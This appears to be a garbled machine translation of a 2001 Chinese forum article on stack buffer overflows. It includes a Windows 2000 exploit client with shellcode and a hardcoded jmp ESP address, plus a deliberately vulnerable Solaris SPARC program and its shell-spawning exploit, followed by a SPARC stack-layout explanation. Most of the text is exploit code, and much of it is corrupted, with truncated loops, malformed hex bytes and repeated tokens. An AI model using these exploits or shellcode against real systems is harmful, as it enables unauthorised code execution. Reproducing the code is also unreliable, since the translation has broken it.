programming will come. Don't think that hacker enters your host. Or, guessing, the software related software, the system, the system, the network-related software, has no programming vulnerabilities, as long as this vulnerability is easy to enter your system !! For example, IIS5 in Win2000 is handled on Win2000. .pri. There is such a problem!! / * Name: ex_serv.ctested: win2k pro sp1 by cloud 2001-6-28 * // include void makebuff () {unsigned char shellcode [108] = {0xEB, 0x3D, 0x5D, 0x33, 0xc0, 0x66, 0x2b, 0xE8, 0x03, 0x2b, 0x, 0x33, 0x4b, 0x4b, 0x33, 0xc0 , 0x88, 0x04, 0x2b, 0x88, 0x45, 0x12, 0x88, 0x45, 0x24, 0x68, 0x73, 0x72, 0xe6, 0x77, 0x55, 0x, 0x54, 0x24, 0x04, 0x33, 0x2, 0x53, 0x8b, 0xc5, 0x83 0xc0, 0x0b, 0x50, 0x83, 0x50, 0x68, 0x2d, 0xf3, 0xE6, 0x77, 0x68, 0x7e, 0x73, 0xe0, 0x77, 0xc3, 0xe8, 0xbe, 0xFF, 0xFF, 0xFF, ' U ',' s', 'e', 'r', '3', '2', '.', 'D', 'L', 'L', '0', 'M', 'E' , 'S', 's', 'a', 'g', 'e', '0', 'f', 'r', 'o', 'm', 20, 'b', 'I' , 'n', 'n', 'a', 'r', 20, 'c', 'o', 'd', 'e', '.', '0', 'n', 'n' , 'N'}; INT I; unsigned long * lp; unsigned char * cp; unsigned long addr; addr = 0x77e6898b; // addr of jmp ESP LP = (unsigned long *) Buffer; for (i = 0; i < (Buffer_Len 8) / 4; i , LP ) * lp = addr; cp = (unsigned char *) lp; for (i = 0; i <32; i , cp ) * CP = 0x90; for (i = 0; i Int apientry Winmain (Hinstance Hinstance, Hinstance Hprevinstance, LPSTR LPCMDLINE, INT NCMDSHOW) {Word WvelsisRequested; Wsadata Wsadata; Int S, ERR WVersionRequested = MakeWord (2, 2); Err = WSAStartup (WVersionRequested, & WSADATA); if (Err! = 0) {Printf ("WS2_32.dll not find! / n"); return -1;} if (Lobyte (Wsadata .wversion)! = 2 || Hibyte (wsadata.wversion)! = 2) {wsacleanup (); printf ("Little Than 2.2! / n"); return -2;} s = connecttcp ("localhost", "5000 "); If (s == 0) {MessageBoxa (0," Connect Failt ",", 0); Return -1;} MakeBuff (); if (Send (S, Buffer, Sizeof (buffer), 0) == SOCKET_ERROR) MessageBoxa (0, "Send Err!", "", 0); Sleep (3000); MessageBoxa (0, "Send OK!", "", 0); wsacleanup (); return 0;} / / END EX_SERV.C -------------------------------------------------- ---------- Client.h ------------------------------------- --------- // Begin Client.h #ifndef inaddr_none # Define INADDR_NONE 0xFFFFFFF # ENDIF Extern int errno; int errexit (const char * format, ...) {va_list args; va_start (args, format); vfprintf (3, format, args); VA_END (ARGS); EXIT (1); int connectsock (const char * host, const char * service, const char * transport) {struct hostent * phe; struct servent * pse; struct protoent * ppe; struct sockaddr_in sin; int s, type; memset (& sin, 0, sizeof (sin)); sin.sin_family = AF_INET; if (PSE = getServByname (service, transport) sin.sin_port = pse-> s_port; else = ((sin.sin_port = HTONS)))) == 0) errexit ("can't get /", service); if (PHE = gethostbyname (host)) Memcpy (& Sin.sin_addr, Phe-> h_addr, Phe-> h_length ); Else IF ((sin.sin_addr.s_addr = inet_addr (host)) == inaddr_none) errexit ("can't get /"% s / "host entry / n", host); if ((PPE = getProtobyname) Transport) == 0) errexit ("can't get /"% s / "protoco entry / n", transport); if (strcmp (TRCMP (TRCMP (TRCMP (TRCMP (TRCMP (TRCMP (TRCMP (TRCMP (TRCMP (TRCMP (TRCMP (TYPORT, "UDP") == 0) Type = SOCK_DGRAM; Else Type = SOCK_STREAM; S = Socket (PF_INET, TYPE, PPE-> P_Proto); if (S <0) Errexit ("Can't Create Socket:% S / N", STRERROR (Errno)); IF (Connect (S, Struct Sockaddr *) & Sin, Sizeof (SiN)) <0) Errexit ("Can't Connect TO% S.% S:% S / N", Host, Service, Strerror (Errno)); Return S;} int connection / const char * service {Return ConnectSock (Host, Service, "TCP"); Int connectudp (const char * host, const char * service) {Return ConnectSock (Host, Service, "UDP");} // End Client.h ----------- [Visual C ]: Spillage overflow on the Solaris for SPAC chip on the Solaris for SPAC chip overflow Cloud (Cloud) 2001-6-27 12:29:11 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column There is also a problem in the UNIX platform overflow. I used to write the attack programs under Solaris as follows: I can see my personal site iceinsun.yah.net has bugs: / * sr.c for sparc solaristested on Solaris2.6 by Cloud 1999-5-16 * / # include U_long get_sp () {__ASM __ ("MOV% SP,% I0 / N"); Main (int Argc, char * argv []) {printf ("static main ->% p / n", get_sp ()); if (argc> 1) {Ill_jump (Argv [1]);} printf OVER! / N ");} Void Ill_Jump (Char * Str) {PrintF (" Static Sub 1 ->% P / N ", GET_SP ()); Printf (" Strlen =% D / N ", Strlen (STR )); Printf ("/ n"); ILL (STR);} Void Ill (Char * STR) {u_char buff [8]; Printf ("Static Sub 2 ->% P Buff Addr% P / N", GET_SP (), BUFF; STRCPY (BUFF, STR); The overflow attack program is as follows: / * EX.C Exploit Sr.c to Get Shell Tested On Solaris 2.6 for sparc by cloud 1999-5-16 * / # include U_CHAR shell_code [] = "/ x82 / x10 / x20 / x20 / x08" "/ x82 / x10 / x20 / xca / xa6 / x1c / xc0 / x13 / x90 / x0c / xc0 / x13 / x92 / X0C / XC0 / X13 "" / xa6 / x04 / x-x01 / x91 / xd4 / xd8 / x9a / xac / x15 / xa1 / x6e "" / x2f / x0b / xdc / xda / x90 / x0b / x80 / x0e / x92 / x03 / xa0 / x08 / x94 / x1a / x80 / x0a "/ x9c / x03 / xa0 / x10 / XEC / X3B / XBF / XF0 / XDC / X23 / XBF / XF8 / XC0 / X23 / XBF / XFC "" / x82 / x20 / x20 / x3b / x91 / xd4 / XFF / XFF "; #define addr_len 88 # Define Nop_len 100 # define code_len 100 # define sparc_nop 0xa61cc013 U_LONG * RETURN_ADDR, TMP_NOP; U_CHAR * REAL_CODE, * NOP_CODE; INT I, ALL_LEN = AddR_LEN NOP_LEN CODE_LEN; Char Buff [AddR_len NOP_LEN CODE_LEN 1]; U_long get_sp () {__ASM __ ("MOV% SP,% I0 / N"); Main () {Printf ("ME Stack -> 0x% P Expect Stack -> 0x% P / N", GET_SP (), GET_SP () - all_len); buff [addr_len nop_len code_len] = '/ 0 '; MEMSET (BUFF,' A ', All_LEN); RETURN_ADDR = (U_LONG *) BUFF; for (i = 0; i nop_code = (u_char *) return_addr; for (i = 0; i REAL_CODE = NOP_CODE; / * FOR (i = 0; I REAL_CODE = (u_char *) return_addr; * / For (i = 0; I Execl ("./ SR", "SR", BUFF, 0);} ----------------- [Visual C ]: Solaris for SPAC Stack of stacks Cloud (Cloud) 2001-6-27 19:28:40 Open Lab (OpenLab.nwpu.edu.cn) [Visual C ] column Look at the stack in this program running, if you can see the FUNC to allocate buff, we can't overwrite the return address of the FUNC, but we can override the return address of Main. So after When MAIN returned to our binary code, this is very different from the overflow under Windows. #include Stack low site ______________________% SP |% L0-% L7 | 8 * 4 Save FUNC ()% L0-% L7 Register | __________ |% SP 32 |% I0-% I7 | 8 * 4 Save Func ()% I0- % I7 register (% i7 contains a return address of FUNC ()) | __________ |% SP 64 | Return Value Address | 1 * 4 For the return value address space preserved by the next modulation function | ______________ 68 | parameters Address | 6 * 4 Space for the next modulated function (first 6) parameters | __________ |% SP 92 | Parameter Address | N * 4 N> = 1 If the next modulated function parameter> 6, more The parameter is allocated here | __________ | | Local Variable | N * 8 is a local variable allocation space of FUNC (), each 8 bytes are one assignment unit | __________ | | Temporary Area | 4 * 4 C Compiler Used to calculate When the expression is stored, some temporary variables are stored | _____________________% FP (Main ())% FP |% L0-% L7 | 8 * 4 Save Main ()% L0-% L7 Register | __________ |% FP 32 |% I0-% i7 | 8 * 4 Save MAIN ()% I0-% I7 register (% i7 contains main () return address) | __________ |% FP 64 | Return Value Address | 1 * 4 is the next Tucedied function (here is FUNC ()) retained return value address space | ____________________ |% FP 68 | Parameter Address | 6 * 4 is the next modulated function (here is FUNC ()) to keep the first 6 parameters Space | __________ |% FP 92 | Parameter Address | N * 4 N> = 1 If the next one is called the parameter> 6, more out The parameter is allocated here | __________ | | Local Variable | | N * 8 For the local variable allocation space of Main (), each 8 bytes are one unit | __________ | | reserved area | 4 * 4 4 Reserved area of the word | __________ | |% L0-% L7 | | ___________ | Stack Gaix -----------
